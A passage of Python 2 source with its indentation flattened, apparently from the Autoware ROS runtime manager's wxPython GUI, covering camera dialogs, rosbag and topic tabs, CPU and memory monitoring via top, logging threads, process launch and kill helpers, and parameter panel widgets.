flags = gdic_org.get('flags', [])[:] # copy
if 'open_dialog' in flags:
flags.remove('open_dialog')
pdic_baks = {}
for cam_id in ids:
(pdic_a, gdic_a, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic = pdic_a if pdic_a else self.load_dic_pdic_setup(cam_id, {})
pdic_baks[cam_id] = pdic.copy()
gdic = gdic_a if gdic_a else gdic_org.copy()
gdic['flags'] = flags
cam_id_obj = self.cam_id_to_obj(cam_id, obj.GetValue())
if not pdic_a or not gdic_a:
self.add_cfg_info(cam_id_obj, cam_id_obj, cam_id, pdic, gdic, False, prm)
if not cam_id_obj in cmd_dic:
cmd_dic[ cam_id_obj ] = (cmd, None)
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
#
# Dialog
#
cam_id = ids[0]
while obj.GetValue():
(pdic, gdic, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic['camera_id'] = cam_id
dic_list_push(gdic, 'dialog_type', 'open2')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
gdic_v = dic_getset(gdic, 'camera_id', {})
args = { 'pdic':pdic, 'ids':ids, 'param_panel':gdic.get('param_panel'), 'dlg':dlg }
gdic_v['hook_var'] = { 'hook':self.camera_id_hook, 'args':args }
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
pdic['camera_id'] = cam_id # restore
if dlg_ret == 0: # OK
break
idx = dlg_ret - 100
if idx < 0 or len(ids) <= idx: # Cancel
for cam_id in ids:
(pdic, _, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic.update(pdic_baks.get(cam_id))
set_val(obj, False)
return
# Menu changed
cam_id = ids[idx]
#
# Launch / Kill
#
for cam_id in ids:
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
(pdic, _, _) = self.obj_to_pdic_gdic_prm(cam_id_obj)
pdic['solo_camera'] = False
#print '@', cam_id, cam_id_obj.GetValue()
self.OnLaunchKill_obj(cam_id_obj)
#
# Input ROSbag File Tab
#
def rosbag_info_hook(self, v):
if not v:
return
th_start(self.rosbag_info_hook_th, {'v':v} )
def rosbag_info_hook_th(self, ev, v): # thread
err = subprocess.STDOUT
s = subprocess.check_output([ 'rosbag', 'info', v ], stderr=err).strip()
wx.CallAfter(self.label_rosbag_info.SetLabel, s)
wx.CallAfter(self.label_rosbag_info.GetParent().FitInside)
def info_col(self, v, v_yellow, v_red, col_normal, col_red):
if v < v_yellow:
return col_normal
if v < v_red:
(nr,ng,nb) = col_normal
(rr,rg,rb) = col_red
return ( (nr+rr)/2, (ng+rg)/2, (nb+rb)/2 )
return col_red
def mem_kb_info(self):
lst = subprocess.check_output(['free']).strip().split('\n')[2].split()[2:4]
used = int(lst[0])
free = int(lst[1])
return (used + free, used)
def toprc_create(self):
(child_pid, fd) = pty.fork()
if child_pid == 0: # child
os.execvp('top', ['top'])
else: #parent
sec = 0.2
for s in ['1', 'c', 'W', 'q']:
time.sleep(sec)
os.write(fd, s)
def toprc_setup(self, toprc, backup):
if os.path.exists(toprc):
os.rename(toprc, backup)
self.toprc_create()
def toprc_restore(self, toprc, backup):
os.remove(toprc)
if os.path.exists(backup):
os.rename(backup, toprc)
# top command thread
def top_cmd_th(self, ev, setting, cpu_ibls, mem_ibl, toprc, backup):
interval = setting.get('interval', 3)
alert_level = setting.get('alert_level', {})
rate_per_cpu = alert_level.get('rate_per_cpu', 80)
rate_per_cpu_yellow = alert_level.get('rate_per_cpu_yellow', 80)
rate_cpu = alert_level.get('rate_cpu', 80)
rate_mem = alert_level.get('rate_mem', 80)
rate_mem_yellow = alert_level.get('rate_mem_yellow', 80)
for ibl in cpu_ibls:
ibl.lmt_bar_prg = rate_per_cpu
mem_ibl.lmt_bar_prg = rate_mem
alerted = False
cpu_n = get_cpu_count()
while not ev.wait(interval):
s = subprocess.check_output(['sh', '-c', 'env COLUMNS=512 top -b -n 2 -d 0.1']).strip()
i = s.rfind('\ntop -') + 1
s = s[i:]
wx.CallAfter(self.label_top_cmd.SetLabel, s)
wx.CallAfter(self.label_top_cmd.GetParent().FitInside)
k = '%Cpu'
fv_sum = 0
i = 0
for t in s.split('\n'):
if t[:len(k)] != k:
continue
lst = t[1:].split()
v = lst[1] if lst[1] != ':' else lst[2]
if v[0] == ':':
v = v[1:]
fv = str_to_float(v)
col = self.info_col(fv, rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
if i < cpu_n:
ibl = cpu_ibls[i]
wx.CallAfter(ibl.lb_set, v+'%', col)
wx.CallAfter(ibl.bar_set, int(fv))
fv_sum += fv
i += 1
k = 'KiB Mem:'
(total, used) = self.mem_kb_info()
rate = 100 * used / total
for u in [ 'KB', 'MB', 'GB', 'TB' ]:
if total <= 10 * 1024 or used <= 10:
break
total /= 1024
used /= 1024
col = self.info_col(rate, rate_mem_yellow, rate_mem, (64,64,64), (200,0,0))
tx = str(used) + u + '/' + str(total) + u + '(' + str(rate) + '%)'
wx.CallAfter(mem_ibl.lb_set, tx, col)
wx.CallAfter(mem_ibl.bar_set, rate)
is_alert = (fv_sum >= rate_cpu * cpu_n) or rate >= rate_mem
# --> for test
if os.path.exists('/tmp/alert_test_on'):
is_alert = True
if os.path.exists('/tmp/alert_test_off'):
is_alert = False
# <-- for test
if is_alert and not alerted:
thinf = th_start(self.alert_th, {'bgcol':(200,50,50)})
alerted = True
if not is_alert and alerted:
th_end(thinf)
alerted = False
# top5
i = s.find('\n\n') + 2
lst = s[i:].split('\n')
hd = lst[0]
top5 = lst[1:1+5]
i = hd.rfind('COMMAND')
cmds = [ line[i:].split(' ')[0] for line in top5 ]
i = hd.find('%CPU')
loads = [ line[i-1:].strip().split(' ')[0] for line in top5 ]
for (lb, cmd, load) in zip(self.lb_top5, cmds, loads):
col = self.info_col(str_to_float(load), rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
wx.CallAfter(lb.SetForegroundColour, col)
wx.CallAfter(lb.SetLabel, cmd + ' (' + load + ' %CPU)')
self.toprc_restore(toprc, backup)
def alert_th(self, bgcol, ev):
wx.CallAfter(self.RequestUserAttention)
c = bgcol
o = wx.NullColour
while not ev.wait(0.5):
for col in [ c, o, c, o, c, o ]:
wx.CallAfter(self.set_bg_all_tabs, col)
time.sleep(0.05)
def log_th(self, file, que, ev):
while not ev.wait(0):
s = file.readline()
if not s:
break
que.put(s)
def logout_th(self, que, interval, tc, ev):
if que == self.log_que_stdout or que == self.log_que_stderr:
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
self.log_que.put(s)
if interval <= 0:
continue
ckbox = self.checkbox_stdout if que == self.log_que_stdout else self.checkbox_stderr
if ckbox.GetValue():
self.log_que_show.put( cut_esc(s) )
else: # == self.log_que
f = None
path = self.status_dic.get('log_path')
is_syslog = (path == 'syslog')
if is_syslog:
ident = sys.argv[0].split('/')[-1]
syslog.openlog(ident, syslog.LOG_PID | syslog.LOG_CONS)
elif path:
path = os.path.expandvars(os.path.expanduser(path))
f = open(path, 'a') if path else None
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
print s.strip()
sys.stdout.flush()
s = cut_esc(s)
if is_syslog:
syslog.syslog(s)
elif f:
f.write(s)
f.flush()
if is_syslog:
syslog.closelog()
if f:
f.close()
def logshow_th(self, que, interval, tc, ev):
while not ev.wait(interval):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
wx.CallAfter(append_tc_limit, tc, s)
# que clear
if self.checkbox_stdout.GetValue() is False and \
self.checkbox_stderr.GetValue() is False and \
que.qsize() > 0:
que_clear(que)
wx.CallAfter(tc.Clear)
#
# for Topics tab
#
def OnRefreshTopics(self, event):
self.refresh_topics_list()
def refresh_topics_list(self):
lst = subprocess.check_output([ 'rostopic', 'list' ]).strip().split('\n')
panel = self.panel_topics_list
szr = self.sizer_topics_list
for obj in self.topics_list:
szr.Remove(obj)
obj.Destroy()
self.topics_list = []
for topic in lst:
obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, topic, '')
self.Bind(wx.EVT_HYPERLINK, self.OnTopicLink, obj)
szr.Add(obj, 0, wx.LEFT, 4)
fix_link_color(obj)
self.topics_list.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
# info clear
lb = self.label_topics_info
lb.SetLabel('')
# echo clear
self.topics_proc_th_end()
# wait que clear
while self.topics_echo_que.qsize() > 0:
time.sleep(0.1)
tc = self.text_ctrl_topics_echo
tc.Enable(False)
wx.CallAfter(tc.Clear)
wx.CallAfter(tc.Enable, True)
self.topics_echo_sum = 0
self.topic_echo_curr_topic = None
def OnEcho(self, event):
if self.checkbox_topics_echo.GetValue() and self.topic_echo_curr_topic:
self.topics_proc_th_start(self.topic_echo_curr_topic)
else:
self.topics_proc_th_end()
def OnTopicLink(self, event):
obj = event.GetEventObject()
topic = obj.GetLabel()
self.topic_echo_curr_topic = topic
# info
info = subprocess.check_output([ 'rostopic', 'info', topic ]).strip()
lb = self.label_topics_info
lb.SetLabel(info)
lb.GetParent().FitInside()
# echo
self.topics_proc_th_end()
if self.checkbox_topics_echo.GetValue():
self.topics_proc_th_start(topic)
def topics_proc_th_start(self, topic):
out = subprocess.PIPE
err = subprocess.STDOUT
self.topics_echo_proc = psutil.Popen([ 'rostopic', 'echo', topic ], stdout=out, stderr=err)
self.topics_echo_thinf = th_start(self.topics_echo_th)
def topics_proc_th_end(self):
thinf = self.topics_echo_thinf
if thinf:
th_end(thinf)
self.topics_echo_thinf = None
proc = self.topics_echo_proc
if proc:
terminate_children(proc)
terminate(proc)
#proc.wait()
self.topics_echo_proc = None
def topics_echo_th(self, ev):
if not self.topics_echo_proc:
return
file = self.topics_echo_proc.stdout
fl = fcntl.fcntl(file.fileno(), fcntl.F_GETFL)
fcntl.fcntl(file.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
while not ev.wait(0):
try:
s = file.read(1)
except:
continue
if not s:
break
if self.checkbox_topics_echo.GetValue():
self.topics_echo_que.put(s)
que_clear(self.topics_echo_que)
def topics_echo_show_th(self, ev):
que = self.topics_echo_que
interval = self.topics_dic.get('gui_update_interval_ms', 100) * 0.001
chars_limit = self.topics_dic.get('gui_chars_limit', 10000)
tc = self.text_ctrl_topics_echo
while not ev.wait(interval):
qsz = que.qsize()
if qsz <= 0:
continue
if qsz > chars_limit:
over = qsz - chars_limit
for i in range(over):
try:
que.get(timeout=1)
except Queue.Empty:
break
qsz = chars_limit
arr = []
for i in range(qsz):
try:
s = que.get(timeout=1)
except Queue.Empty:
s = ''
arr.append(s)
s = ''.join(arr)
self.topics_echo_sum += len(s)
rm_chars = 0
if self.topics_echo_sum > chars_limit:
rm_chars = self.topics_echo_sum - chars_limit
self.topics_echo_sum = chars_limit
if self.checkbox_topics_echo.GetValue():
wx.CallAfter(append_tc_limit, tc, s, rm_chars)
#
# Common Utils
#
def set_param_panel(self, obj, parent):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
panel = ParamPanel(parent, frame=self, pdic=pdic, gdic=gdic, prm=prm)
sizer_wrap((panel,), wx.VERTICAL, 0, wx.EXPAND, 0, parent)
k = 'ext_toggle_enables'
gdic[ k ] = gdic.get(k, []) + [ panel ]
def obj_to_varpanel(self, obj, var_name):
gdic = self.obj_to_gdic(obj, {})
return gdic.get(var_name, {}).get('var')
def obj_to_varpanel_tc(self, obj, var_name):
vp = self.obj_to_varpanel(obj, var_name)
return vp.tc if vp and vp.tc else None
def OnConfig(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def add_params(self, params):
for prm in params:
if 'topic' in prm and 'msg' in prm:
klass_msg = globals()[ prm['msg'] ]
prm['pub'] = rospy.Publisher(prm['topic'], klass_msg, latch=True, queue_size=10)
self.params += params
def gdic_get_1st(self, dic):
gdic = dic.get('gui', {})
gdic['update_func'] = self.update_func
return gdic
def add_cfg_info(self, cfg_obj, obj, name, pdic, gdic, run_disable, prm):
self.config_dic[ cfg_obj ] = { 'obj':obj , 'name':name , 'pdic':pdic , 'gdic':gdic,
'run_disable':run_disable , 'param':prm }
def get_param(self, prm_name):
return next( (prm for prm in self.params if prm['name'] == prm_name), None)
def get_var(self, prm, var_name, def_ret=None):
return next( (var for var in prm.get('vars') if var.get('name') == var_name), def_ret)
def obj_to_cmd_dic(self, obj):
return next( (cmd_dic for cmd_dic in self.all_cmd_dics if obj in cmd_dic), None)
def obj_to_cmd_dic_cmd_proc(self, obj):
cmd_dic = self.obj_to_cmd_dic(obj)
if cmd_dic is None:
return (None, None, None)
(cmd, proc) = cmd_dic.get(obj, (None, None))
return (cmd_dic, cmd, proc)
def OnLaunchKill(self, event):
self.OnLaunchKill_obj(event.GetEventObject())
def OnLaunchKill_obj(self, obj):
self.alias_sync(obj)
obj = self.alias_grp_top_obj(obj)
v = obj.GetValue()
add_args = self.obj_to_add_args(obj, msg_box=v) # no open dialog at kill
# print("add_args", add_args)
if add_args is False:
set_val(obj, not v)
return
(cmd_dic, _, proc_bak) = self.obj_to_cmd_dic_cmd_proc(obj)
self.launch_kill_proc(obj, cmd_dic, add_args=add_args)
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc != proc_bak:
self.toggle_enable_obj(obj)
if proc:
self.update_proc_cpu(obj)
def OnROSbagPlay(self, event):
obj = event.GetEventObject()
play = self.button_play_rosbag_play
stop = self.button_stop_rosbag_play
pause = self.button_pause_rosbag_play
(_, _, prm) = self.obj_to_pdic_gdic_prm(play)
var = self.get_var(prm, 'sim_time', {})
if obj == play:
var['v'] = True
self.OnLaunchKill_obj(play)
button_color_change(play); self.button_confirm_depth.Disable()
set_val(stop, False);self.button_play_rosbag_play2.Disable()
set_val(pause, False);self.button_confirm_topics.Disable()
elif obj == stop:
set_val(stop, True); self.button_confirm_depth.Enable()
set_val(play, False); self.button_play_rosbag_play2.Enable()
set_val(pause, False);self.button_confirm_topics.Enable()
var['v'] = False
self.OnLaunchKill_obj(play)
button_color_change(stop)
elif obj == pause:
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(play)
if proc:
proc.stdin.write(' ')
def OnFtrace(self, event):
obj = event.GetEventObject()
cmd = 'rosrun runtime_manager ftrace.py'
v = obj.GetValue()
self.ftrace_proc_ = self.launch_kill(v, cmd,
None if v else self.ftrace_proc_, obj=obj)
def stdout_file_search(self, file, k):
s = ''
while True:
c = file.read(1)
if not c:
return None
if c != '\r' and c != '\n':
s += c
continue
s = s.strip()
if k in s:
break
s = ''
i = s.find(k) + len(k)
return s[i:]
# thread
def point_cloud_progress_bar(self, file, ev):
obj = self.button_point_cloud
(pdic, _, _) = self.obj_to_pdic_gdic_prm(obj)
n = len(pdic.get('path_pcd', '').split(','))
if n == 0:
return
i = 0
while not ev.wait(0):
s = self.stdout_file_search(file, 'load ')
if not s:
break
err_key = 'failed '
if s[:len(err_key)] != err_key:
i += 1
else:
i -= 1
print s
wx.CallAfter(self.label_point_cloud_bar.set, 100 * i / n)
wx.CallAfter(self.label_point_cloud_bar.clear)
# thread
def rosbag_play_progress_bar(self, file, ev):
while not ev.wait(0):
s = self.stdout_file_search(file, 'Duration:')
if not s:
break
lst = s.split()
pos = str_to_float(lst[0])
# lst[1] is '/'
total = str_to_float(lst[2])
if total == 0:
continue
prg = int(100 * pos / total + 0.5)
pos = str(int(pos))
total = str(int(total))
wx.CallAfter(self.label_rosbag_play_bar.set, prg)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, pos)
wx.CallAfter(self.label_rosbag_play_total.SetLabel, total)
wx.CallAfter(self.label_rosbag_play_bar.clear)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, '')
wx.CallAfter(self.label_rosbag_play_total.SetLabel, '')
def alias_sync(self, obj, v=None):
en = None
if getattr(obj, 'IsEnabled', None):
(key, en) = enables_get_last(obj)
if not key:
en = obj.IsEnabled()
grp = self.alias_grp_get(obj)
if getattr(obj, 'GetValue', None):
v = obj.GetValue()
for o in grp:
if o is obj:
continue
if en is not None and o.IsEnabled() != en and not self.is_toggle_button(o):
if key:
enable_set(o, key, en)
else:
o.Enable(en)
if v is not None and getattr(o, 'SetValue', None):
set_val(o, v)
if getattr(o, 'SetInsertionPointEnd', None):
o.SetInsertionPointEnd()
def alias_grp_top_obj(self, obj):
return get_top(self.alias_grp_get(obj), obj)
def alias_grp_get(self, obj):
return next( (grp for grp in self.alias_grps if obj in grp), [])
def create_tree(self, parent, items, tree, item, cmd_dic):
name = items.get('name', '')
if tree is None:
style = wx.TR_HAS_BUTTONS | wx.TR_NO_LINES | wx.TR_HIDE_ROOT | wx.TR_DEFAULT_STYLE | wx.SUNKEN_BORDER
tree = CT.CustomTreeCtrl(parent, wx.ID_ANY, agwStyle=style)
item = tree.AddRoot(name, data=tree)
tree.Bind(wx.EVT_MOTION, self.OnTreeMotion)
else:
ct_type = 1 if 'cmd' in items else 0 # 1:checkbox type
item = tree.AppendItem(item, name, ct_type=ct_type)
if 'desc' in items:
item.SetData(items.get('desc'))
if 'cmd' in items:
cmd_dic[item] = (items['cmd'], None)
pdic = self.load_dic_pdic_setup(name, items)
pnl = wx.Panel(tree, wx.ID_ANY)
add_objs = []
self.new_link(item, name, pdic, self.sys_gdic, pnl, 'sys', 'sys', add_objs)
gdic = self.gdic_get_1st(items)
if 'param' in items:
self.new_link(item, name, pdic, gdic, pnl, 'app', items.get('param'), add_objs)
else:
self.add_cfg_info(item, item, name, None, gdic, False, None)
szr = sizer_wrap(add_objs, wx.HORIZONTAL, parent=pnl)
szr.Fit(pnl)
tree.SetItemWindow(item, pnl)
for sub in items.get('subs', []):
self.create_tree(parent, sub, tree, item, cmd_dic)
return tree
def new_link(self, item, name, pdic, gdic, pnl, link_str, prm_name, add_objs):
lkc = None
if 'no_link' not in gdic.get('flags', []):
lkc = wx.HyperlinkCtrl(pnl, wx.ID_ANY, link_str, "")
fix_link_color(lkc)
self.Bind(wx.EVT_HYPERLINK, self.OnHyperlinked, lkc)
if len(add_objs) > 0:
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, ' ') ]
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, '['), lkc, wx.StaticText(pnl, wx.ID_ANY, ']') ]
prm = self.get_param(prm_name)
self.add_cfg_info(lkc if lkc else item, item, name, pdic, gdic, False, prm)
def load_dic_pdic_setup(self, name, dic):
name = dic.get('share_val', dic.get('name', name))
pdic = self.load_dic.get(name, {})
self.load_dic[ name ] = pdic
return pdic
def launch_kill_proc(self, obj, cmd_dic, add_args=None):
if obj not in cmd_dic:
set_val(obj, False)
print('not implemented.')
return
v = obj.GetValue()
(cmd, proc) = cmd_dic[obj]
if not cmd:
set_val(obj, False)
proc = self.launch_kill(v, cmd, proc, add_args, obj=obj, kill_children=True)
(cfg_obj, dic) = self.cfg_obj_dic( {'obj':obj} )
if cfg_obj and dic.get('run_disable'):
cfg_obj.Enable(not v)
cmd_dic[obj] = (cmd, proc)
if not v:
self.stat_label_off(obj)
def launch_kill_proc2(self, obj, cmd_dic, add_args=None, is_rapid_delete=None):
v = obj.GetValue()
(cmd, proc) = cmd_dic[obj]
if not cmd:
set_val(obj, False)
proc = self.launch_kill(v, cmd, proc, add_args, obj=obj, is_rapid_delete=is_rapid_delete)
self.cmd_dic[obj] = (cmd, proc); return proc
def proc_to_cmd_dic_obj(self, proc):
for cmd_dic in self.all_cmd_dics:
obj = next( (obj for (obj, v) in cmd_dic.items() if proc in v), None)
if obj:
return (cmd_dic, obj)
return (None, None)
def launch_kill(self, v, cmd, proc, add_args=None, sigint=None, obj=None, kill_children=None, is_rapid_delete=False):
msg = None
msg = 'already launched.' if v and proc else msg
msg = 'already terminated.' if not v and proc is None else msg
msg = 'cmd not implemented.' if not cmd else msg
if msg is not None:
print(msg)
return proc
if v:
args = shlex.split(cmd)
if add_args:
args += add_args
f = self.obj_to_gdic(obj, {}).get('stdout_func')
f = eval_if_str(self, f)
f = f if f else self.log_th
out = subprocess.PIPE if f else None
err = subprocess.STDOUT if f else None
if f == self.log_th:
err = subprocess.PIPE
proc = psutil.Popen(args, stdin=subprocess.PIPE, stdout=out, stderr=err)
self.all_procs.append(proc)
if f == self.log_th:
thinf = th_start(f, {'file':proc.stdout, 'que':self.log_que_stdout})
self.all_th_infs.append(thinf)
thinf = th_start(f, {'file':proc.stderr, 'que':self.log_que_stderr})
self.all_th_infs.append(thinf)
elif f:
thinf = th_start(f, {'file':proc.stdout})
self.all_th_infs.append(thinf)
else:
flags = self.obj_to_gdic(obj, {}).get('flags', [])
if sigint is None:
sigint = 'SIGTERM' not in flags
if is_rapid_delete:
sigint = False
flags = ["SIGTERM", "kill_children"]
if kill_children is None:
kill_children = 'kill_children' in flags
if kill_children:
terminate_children(proc, sigint)
terminate(proc, sigint)
proc.wait()
if proc in self.all_procs:
self.all_procs.remove(proc)
proc = None
return proc
def roslaunch_to_nodes(self, cmd):
try:
s = subprocess.check_output(cmd).strip()
return s.split('\n') if s != '' else []
except subprocess.CalledProcessError:
return []
def set_bg_all_tabs(self, col=wx.NullColour):
add_pnls = [
self,
# self.tree_ctrl_0,
# self.tree_ctrl_1,
# self.tree_ctrl_data
]
for tab in self.all_tabs + add_pnls:
tab.SetBackgroundColour(col)
def get_autoware_dir(self):
dir = rtmgr_src_dir() + '../../../../../../'
return os.path.abspath(dir)
def load_yaml(self, filename, def_ret=None):
return load_yaml(filename, def_ret)
def toggle_enable_obj(self, obj):
objs = []
pfs = [ 'button_play_', 'button_stop_', 'button_pause_',
'button_ref_', 'text_ctrl_' ]
key = self.obj_key_get(obj, pfs)
if key:
objs += self.key_objs_get(pfs, key)
gdic = self.obj_to_gdic(obj, {})
objs += [ eval_if_str(self, e) for e in gdic.get('ext_toggle_enables', []) ]
self.toggle_enables(objs)
def toggle_enables(self, objs):
for obj in objs:
if getattr(obj, 'IsEnabled', None):
en = enables_get(obj, 'toggle', obj.IsEnabled())
enables_set(obj, 'toggle', not en)
self.alias_sync(obj)
def is_toggle_button(self, obj):
return self.name_get(obj).split('_')[0] == 'button' and getattr(obj, 'GetValue', None)
def obj_name_split(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return (None, None)
return next( ( ( name[:len(pf)], name[len(pf):] ) for pf in pfs if name[:len(pf)] == pf ), None)
def obj_key_get(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return None
return next( (name[len(pf):] for pf in pfs if name[:len(pf)] == pf), None)
def key_objs_get(self, pfs, key):
return [ self.obj_get(pf + key) for pf in pfs if self.obj_get(pf + key) ]
def name_get(self, obj):
return next( (nm for nm in dir(self) if getattr(self, nm) is obj), None)
def name_get_cond(self, obj, cond=(lambda s : True), def_ret=None):
return next( (nm for nm in dir(self) if cond(nm) and getattr(self, nm) is obj), def_ret)
def val_get(self, name):
obj = self.obj_get(name)
if obj is None:
return None
return obj.GetValue() if getattr(obj, 'GetValue', None) else None
def obj_get(self, name):
return getattr(self, name, None)
def gdic_dialog_type_chk(gdic, name):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
tail = '_dialog_only'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
only_chk = next( (False for (k,type) in lst if type != dlg_type and name in gdic.get(k, [])), True)
tail = '_dialog_allow'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
allow_chk = next( (False for (k,type) in lst if type == dlg_type and name not in gdic.get(k, [])), True)
return only_chk and allow_chk
def gdic_dialog_name_get(gdic):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
return gdic.get(dlg_type + '_dialog', gdic.get('dialog', 'MyDialogParam') )
class ParamPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.frame = kwds.pop('frame')
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
wx.Panel.__init__(self, *args, **kwds)
self.gdic['param_panel'] = self
obj = self.frame.cfg_prm_to_obj( {'pdic':self.pdic, 'gdic':self.gdic, 'param':self.prm} )
(_, _, proc) = self.frame.obj_to_cmd_dic_cmd_proc(obj)
hszr = None
self.vps = []
self.tmp_msg = None
szr = wx.BoxSizer(wx.VERTICAL)
topic_szrs = (None, None)
vars = self.prm.get('vars')
if self.gdic.get('show_order'):
var_lst = lambda name, vars : [ var for var in vars if var.get('name') == name ]
vars = reduce( lambda lst, name : lst + var_lst(name, vars), self.gdic.get('show_order'), [] )
for var in vars:
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
bak_stk_push(gdic_v, 'func')
if gdic_v.get('func'):
continue
v = self.pdic.get(name, var.get('v'))
vp = VarPanel(self, var=var, v=v, update=self.update)
vp.setup_tooltip()
self.vps.append(vp)
gdic_v['var'] = vp
gdic_v['func'] = vp.get_v
prop = gdic_v.get('prop', 0)
border = gdic_v.get('border', 0)
flag = wx_flag_get(gdic_v.get('flags', []))
do_category = 'no_category' not in gdic_v.get('flags', [])
if do_category and self.in_msg(var):
bak = (szr, hszr)
(szr, hszr) = topic_szrs
if szr is None:
szr = static_box_sizer(self, 'topic : ' + self.prm.get('topic'))
bak[0].Add(szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = szr
if vp.is_nl():
hszr = None if hszr else hszr
flag |= wx.EXPAND
else:
if hszr is None:
hszr = wx.BoxSizer(wx.HORIZONTAL)
szr.Add(hszr, 0, wx.EXPAND)
flag |= wx.ALIGN_CENTER_VERTICAL
targ_szr = hszr
if do_category and 'rosparam' in var:
rp_szr = static_box_sizer(self, 'rosparam : ' + var.get('rosparam'))
targ_szr.Add(rp_szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = rp_szr
user_category = gdic_v.get('user_category')
if user_category is not None and hszr:
user_szr = static_box_sizer(self, user_category, orient=wx.HORIZONTAL)
(flgs, bdr) = gdic_v.get('user_category_add', [ [], 0 ])
targ_szr.Add(user_szr, 0, wx_flag_get(flgs), bdr)
targ_szr = hszr = user_szr
targ_szr.Add(vp, prop, flag, border)
if 'nl' in gdic_v.get('flags', []):
hszr = None
if do_category and self.in_msg(var):
topic_szrs = (szr, hszr)
(szr, hszr) = bak
if 'hline' in gdic_v.get('flags', []) and hszr is None:
szr.Add(wx.StaticLine(self, wx.ID_ANY), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, 4)
if not self.in_msg(var) and var.get('rosparam'):
k = 'ext_toggle_enables'
self.gdic[ k ] = self.gdic.get(k, []) + [ vp ]
enables_set(vp, 'toggle', proc is None)
if 'disable' in gdic_v.get('flags', []):
vp.Enable(False)
if 'hide' in gdic_v.get('flags', []):
vp.Hide()
self.SetSizer(szr)
if 'no_init_update' not in self.prm.get('flags', []):
self.update()
def get_gdic_v_and_chk_enable(self, var_name):
gdic_v = dic_getset(self.gdic, var_name, {})
if 'panel' in gdic_v and dic_eval_if_str(self.frame, gdic_v, 'panel') != self.GetParent():
return None
return gdic_v
def update(self, var=None):
update_func = self.gdic.get('update_func')
if update_func:
self.gdic['update_func_arg_var'] = var
update_func(self.pdic, self.gdic, self.prm)
def detach_func(self):
for var in self.prm.get('vars'):
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
if 'func' in gdic_v:
bak_stk_pop(gdic_v, 'func')
vp = gdic_v.get('var')
lst_remove_once(self.gdic.get('ext_toggle_enables', []), vp)
def in_msg(self, var):
if 'topic' not in self.prm or 'msg' not in self.prm:
return False
if self.tmp_msg is None:
klass_msg = globals().get( self.prm.get('msg') )
if klass_msg is None:
return False
self.tmp_msg = klass_msg()
(obj, attr) = msg_path_to_obj_attr(self.tmp_msg, var.get('name'))
return obj and attr in obj.__slots__
class VarPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.var = kwds.pop('var')
v = kwds.pop('v')
self.update = kwds.pop('update')
wx.Panel.__init__(self, *args, **kwds)
self.min = self.var.get('min')
self.max = self.var.get('max')
self.has_slider = self.min is not None and self.max is not None
self.lb = None
label = self.var.get('label', '')
self.kind = self.var.get('kind')
if self.kind == 'radio_box':
choices = self.var.get('choices', [])
style = wx.RA_SPECIFY_COLS if self.var.get('choices_style') == 'h' else wx.RA_SPECIFY_ROWS
self.obj = wx.RadioBox(self, wx.ID_ANY, label, choices=choices, majorDimension=0, style=style)
self.choices_sel_set(v)
self.Bind(wx.EVT_RADIOBOX, self.OnUpdate, self.obj)
return
if self.kind == 'menu':
choices = self.var.get('choices', [])
self.obj = wx.Choice(self, wx.ID_ANY, choices=choices)
self.choices_sel_set(v)
self.Bind(wx.EVT_CHOICE, self.OnUpdate, self.obj)
if label:
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
sizer_wrap((self.lb, self.obj), wx.HORIZONTAL, 0, flag, 4, self)
return
if self.kind == 'checkbox':
self.obj = wx.CheckBox(self, wx.ID_ANY, label)
self.obj.SetValue(v)
self.Bind(wx.EVT_CHECKBOX, self.OnUpdate, self.obj)
return
if self.kind == 'checkboxes':
item_n = dic_eval_if_str(self, self.var, 'item_n', 1)
self.obj = Checkboxes(self, item_n, label)
self.obj.set(v)
for box in self.obj.boxes:
self.obj.Bind(wx.EVT_CHECKBOX, self.OnUpdate, box)
return
if self.kind == 'toggle_button':
self.obj = wx.ToggleButton(self, wx.ID_ANY, label)
set_val(self.obj, v)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnUpdate, self.obj)
button_color_hdr_setup(self.obj)
return
if self.kind == 'hide':
self.Hide()
return
szr = wx.BoxSizer(wx.HORIZONTAL)
